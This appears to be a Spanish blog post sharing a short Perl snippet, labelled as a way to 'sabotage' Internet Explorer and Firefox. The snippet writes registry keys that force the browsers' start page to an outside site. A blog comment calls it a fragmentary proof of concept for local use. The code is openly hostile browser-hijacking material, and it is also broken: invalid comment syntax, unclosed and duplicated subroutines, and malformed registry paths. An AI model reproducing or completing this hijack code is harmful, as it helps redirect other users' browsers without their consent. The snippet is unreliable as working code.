***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/t", "REG_SZ" ];
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= ["http://nobanet.xternal-host.com/", "REG_SZ" ];
No quiero entrar en tantos datos porque el perl no es mi lenguaje jeje y la verdad no soy programador, se ahi un poco de FORTRAN, COBOL, C pero pues el resto de lenguajes lo que se es lo basico, pero claro con este codigo y un poco de imaginacion podemos hacer mucho.
Cedido por P3t3rp4n
Comentarios, d su blog:
Para hacerlo funcionar:
Pues el código perl, tendrías que descargarte el intérprete (Active Perl) e instalarlo. Después te metes en el directorio en el que lo has instalado y pones perl [nombre del archivo] para ejecutarlo. De todos modos, el código es tan solo una prueba de concepto; actúa sobre tu propio ordenador, no en remoto, y además es código fragmentario de como acceder a los datos, no lo manda ni lo utiliza...
Aquí tienes un manual de pearl, pero sin unas bases sólidas de informática, esto requiere demasiado tiempo y normalmente pocos resultados:
http://www.manualesutiles.com/manuales/Manual%20de%20pearl.zip
Suscribirse a:
Entradas (Atom)